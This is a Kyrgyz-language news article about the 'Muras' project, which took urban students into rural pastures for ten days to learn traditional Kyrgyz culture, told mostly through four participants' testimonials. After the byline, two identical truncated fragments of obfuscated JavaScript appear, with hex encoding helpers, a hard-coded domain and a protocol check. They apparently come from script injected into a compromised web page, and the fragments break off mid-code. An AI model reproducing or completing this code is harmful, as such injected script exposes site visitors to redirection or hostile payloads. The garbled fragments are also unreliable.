“МУРАС” ДОЛБООРУ. ШААРДЫК ЖАШТАРДЫ ЖАҢЫ ДҮЙНӨГӨ КАБЫЛТКАН 10 КҮН

9-паспорт фото

Элдик салттуу билимдерге умтулуу – азыркы учурдун эӊ маанилүү тапшырмаларынан болууда. Ооба, элдик даанышмандыкты кадимкидей жээришип, ал кара сандыктын астында чаӊ басып калган мезгилге да туш болгон. Деген менен, ылайда жаткан алтын, алтын бойдон сакталат демекчи, убакыт-сааты чыкканда аталган салттуу билимдер заман зарылдыгы болуп, кайрадан жашоо булагын ачып берүүдө. Ачып гана тим болбой, сабоого бышкан кымыздай болуп өзүнүн аныктыгына чыгууда.

Биз бардыгыбыз өмүрдү кадырлайбыз, ар бирибиз жеке өмүр жолубуз менен кошо улуттун тагдырына бекигенбиз. Жеке тагдырды обочолонтуп элдик жашоодон бөлөк караган туура эмес. Андай боло турган болсо жашоонун мааниси ачылбайт, адам ажарына чыкпайт. Акыры бардыгыбыз эл менен бийикбиз. Антпесе, улут болуп жашаганыбыздын мааниси эмнеде?

Азыркы убакыт аралыгы биз үчүн адашуунун, жаӊылуунун, кемсинүүнүн, бири-бирибизди кабылдабоонун, акыры барып туура жол тандоонун учуру. Мына ушундай шартта жаштардын жасаар ишинин негизи эмнеде болуш керек эле деген суроого «Көчмөн-номад» Коомдук фонду өзүнүн «Мурас» аттуу долбоору аркылуу жооп бергенге аракет кылды.

Долбоордун мүдөөсү – шаарда чоӊоюп-өскөн жаштарды жер-жерлердеги салттуу билимдер менен тааныштыруу жана аларды элдик маданиятка аралаштырууда болду. Салттуу билимдерди окутуу сапарынын алкагында Нарын, Кочкор, Кемин, Ысык-Көл аймактарынын жайлоо жерлеринде болуп, ошол жактагы айыл турмушу менен таанышуу жүрдү.

Алгач, долбоордун катышуучулары атайын сынак аркылуу тандалып алынып, үч ай бою салттуу маданият боюнча окууларга катышышып, анан ошонун негизинде аймактарды кыдыруу сапары уюштурулду. Эмесе, сапар тууралуу калган сөздү жана жеке таасирлер боюнча ой бөлүшүүнү катышуучуларга берелик.

3-Ламира

Ламира КУРУТ, КММАнын 1-курсунун студенти: “Жашоо мен үчүн көркүнө чыкты”

Тамыр – дарактын башталышы. Жалбырактар канчалык бийиктеги бутактан өсүп чыкпасын, алар баары бир тамырдан акырындап көтөрүлүп барган сууга муктаж. Эгер кокус суу келбей кала турган болсо, жалбырактын соолуп калгандан башка аргасы жок. 10 күндүк долбоор жүрүшү –  мен үчүн ошол суу сымал кыргыздык өзөгүмдү ойготуп, дымагымды көтөрдү, мен тамырыма  кайта баштадым. Бул 10 күн мен үчүн абдан эле өзгөчө окуя болду десем болот.

Жайлоодо өткөрүлгөн үч күн болсо бизди дээрлик азыркы заманбап жашоодон четтетип, эч кандай электр жарыгы, интернет, заманбап буюм-тайымдардын жок болгону, айлана-чөйрөбүздү жалаӊ гана тоолор курчап турганы – такыр бөлөк дүйнөгө туш кылды. Биз эски буюм-оокаттарды гана колдонуп, жадагалса самоорубуз 1906-жылкы болду. Боз үйлөрдө кыналып жатып, жайлоонун ысык-суугуна карабастан көӊүлдүү маанайдагы күндөрдү өткөрдүк.

9-2

Тоо жерине чыга бербеген биз үчүн көптөгөн нерселер жаӊылык болду. Чачтарыбызды беш көкүл кылып өрүп жүрдүк, ошондой эле, кыздарга тиешелүү оокаттарды жасаганга үлгүрүп жаттык. Ал эми орусча кошуп сүйлөгөн ар бир сөзүбүз үчүн 10 сомдон айып пул салынып, бардыгыбыз таза кыргыз тилинде сүйлөшүүгө аракет кылдык. Бул да болсо өзүбүздү тарбиялоонун, көндүрүүнүн жолу болду окшойт. Албетте, шаардагы ыӊгайлуу, жылуу-жумшак жашоого көнүп калган бизге, шаардыктарга кыйын болбой койгон жок. Бирок,дал ушул табияттын койнунда жашап турган кезде эркиндиктин мааниси билинет экен. Эртеӊ менен ойгонгондо боз үйдөн сыртка чыксаӊ: керемет тоолор, ылдый жакта чалкыган Ысык-Көл, таза аба… Жашоо мен үчүн көркүнө чыкты, бакытка бөлөндүм.

Долбоордун күндөрү соңуна чыгып, Бишкекке да кайттык. Бүгүн таӊда туруп, өзүм жашаган көп кабаттуу үйдөн чыгып айланага көз чаптырсам, баягынын бири жок, көрүнүш такыр башка, маанай да башка. Көрсө, шаар баары бир бизди кайсы бир деӊгээлде чектеп, кысып турат окшойт. Табият менен камыр-жумур болгон кыргыздар бекеринен эркиндикти, кенендикти сүйбөсө керек деген бүтүмгө келип, мен дагы ошого болгон өзүмдөгү умтулууну байкадым. Биздин элдин айкөлдүгүн, конок пейилин, адамгерчилигин, тазалыгын тааныткан бул окуу сапары жеке мага абдан кызыктуу болуп, руханий азыктануума чоӊ өбөлгө болду.

9-Катя

Катя ХЕВУК, КУУнун алдындагы Конфуций институтунун 2-курсунун студенти: “Мага ичеги-карын артуу жакты”

Кыргыз жеринин кооздугу менен кошо элдик салттуу билимдер менен таанышканыбыз, көптү үйрөнгөнүбүз – биз үчүн кыргыз маданиятын тереңинен билүүгө чоң себеп болду.

Мен буга чейин эле кыргыз тилин үйрөнүүгө аракет кылып келгем, жана бул сапар учурунда кыргыз тилинде гана сүйлөшүүгө аракет кылганыбыз мага жакшы тажрыйба болду. 10 күндүк окуу туруна катышып калганымдын бир себеби да ушул: кыргыз тилинде жакшы сүйлөө үчүн эл менен пикир алышуу болчу. Анткени, Кыргызстанда жашаган соң, кыргыз тилин билүү менен биз жалпы элге сый көргөзгөн дагы болобуз. Нарынга барганда өмүрүмдө биринчи жолу ичеги-карын артып көрдүм. Башында көзүмө өөн учурап, бир башкача сезимдер пайда болгон эле, бирок бат эле көнүп кеттим. Кийин Ысык-Көлгө барганда дагы кызыгып, ичеги-карын артып көрдүм, мага бул иш жакты. Дагы бир баса белгилеп айта кетчү нерсе,  айыл жериндеги кыргыздардын меймандостугу абдан таң калтырды. Шаарда чоңоюп өскөн кыз катары, мындай нерсе мага чыны менен эле таң калыштуу көрүндү. Кыргыз эли кичи пейил, конокту мыкты сыйлаган эл экенине дагы бир ирет ынандым. Ал эми мен байкаган эң чоң өзгөчөлүк – бул сый.

9-6

Кыргыздарда улууларды сыйлоо, өз-өз орундарын билүү, дегеле  дасторкондун үстүндө отурганда бири-бирин сыйлоо абдан бийик деңгээлде экенин түшүндүм. Мындай көрүнүш албетте жүрөктү жылытпай койбойт.  Жакшы сезим менен эстей турган көрүнүштөрдүн дагы бири –  бугу-маралдарды көргөнүбүз. Алар ушунчалык сулуу жаныбар экен, бардыгыбыз жабалактап, таңдана карап, аябай сүрөткө түштүк. Быйылкы салттуу билим менен таанышкан он күнүм жашоомо чоң байлык болуп берди деп ынанымдуу айта алам. Ушул окутуу турун уюштурган уюштуруучуларга жана биздин жалпы катышуучуларга терең ыраазычылык билдирем.

3-Айзирек

Айзирек АЛМАЗБЕКОВА, Кыргы-Түрк Манас университетинин 1-курсунун студенти: “Шаардык жаштарга мындай долбоор өтө маанилүү”

Ошентип, биздин окуу сапарыбыз дагы аягына келип жетти. Нукуралыкка суусаган шаардык жаштар үчүн арналган бул долбоор сейрек жана өзгөчө пайдалуу болуп, бул күндөр – унутулгус күндөргө айланды.

Адегенде сапарыбыз Нарын облусунан башталды. Буга чейин бул аймакты көргөн эмес элем, Нарын шаары мен күткөндөн алда канча өнүккөн шаар экен жана андагы жергиликтүү эл меймандостугу менен эсте калды. Кийинки күндөрдү Ысык-Көлдүн түштүк жээгинде өткөрдүк. Шаардык жаштардын айыл жериндеги турмушка аралашышына, ал жердеги сакталып калган салттуу билимдер менен таанышууга  багытталган бул долбоор менимче өз максатына жетти. Анткени, катышуучулардын бардыгы он күндүн ичиндеги көргөнүнө, укканына, билгенине катуу таасирленишти.

3-паспорт фото

Сапардан Бишкекке кайтып келгенден кийин, шаардык кыздар үйүндө беш көкүл өрүп, мурда кыргызча ыр укпагандар кыргызча ыр жатташып, өз ара кыргыз тилинде пикир алышууга өтүштү. Бул албетте абдан жакшы саамалык деп ойлойм. Шаар жеринде өсүп чоӊойгон балдар-кыздар үчүн мындай долбоор өтө маанилүү, себеби, бардыгында эле салттуу маданиятка аралашып турууга шарты боло бербейт экен. Мындан улам,  жаштардын салттуу билимдер менен таанышуусу, аларды тереӊинен түшүнүүсү келечек үчүн зарыл деп эсептейм. Эӊ биринчи кезекте, биз өз маданиятыбыз жана тилибиз менен улутпуз.

3-Гульзат

Гүлзат ЭРГЕШБАЕВА, КГУСТАнын 1-курсунун студенти: “Бар турмушту кадырлаганга үйрөндүм”

“Мурас” долбоору мен үчүн көптөгөн жаӊы ачылыштар менен кошо майнаптуу билим дагы бере алды. Анын үстүнө, долбоордун катышуучулары дагы өзгөчө кызыктуу, шайыр, ачык балдар-кыздар экен. Мен ушундай билимдүү, алдыга умтулган мекенчил жаштар менен таанышып, бирге сапарлаш болгонума абдан кубанычтамын.

Билгенибизден биле элегибиз көп демекчи, өзүбүздү кыргыз деп жүргөнүбүз менен, улутубузга тиешелүү каада-салт, нарк-насилди толук кандуу биле бербейт экенбиз. Сапарыбыздын учурунда биз ар кандай шарттарда жашаганга туура келди, бул дагы болсо шаар ыӊгайлуулугунан алыстап, жашоого сергек караганга  жардам берди. Мындай учурда ар бир нерсени баалап, болгон бар турмушту кадырлап калат экенсиң. Мен ушуну жон терим менен сездим. Ушуга үйрөндүм.

Өзгөчө, Нарын жергесиндеги жаратылыш коругунан жан-жаныбарлар менен аралашканым мага чоӊ таасирин тийгизди. Мен өмүрүмдө биринчи жолу атка миндим, биринчи жолу бүркүттү жанынан көрдүм, бугу менен сүрөткө түштүм, биринчи жолу жаа аттым, биринчи жолу боз үйгө уктадым. Ал эми жайлоодо жашаган күндөрүбүздө кыздардын бардыгына беш көкүл өрүп бердим жана боз үй ичиндеги, тышындагы иштерде кыргыз салттуулугунан түшүнүк ала алдык.

Бир сөз менен айтканда, мага долбоордогу табият менен шайкеш, ынак болгон кыргыз жашоосу абдан жакты. Катышуучулар менен бир туугандай болуп мамиле күткөнүмө жана долбоордун уюштуруучуларына чоң ыраазычылык билдирем!

Акыл АЙДАРОВ

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “kok-asaba.journalist.kg”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *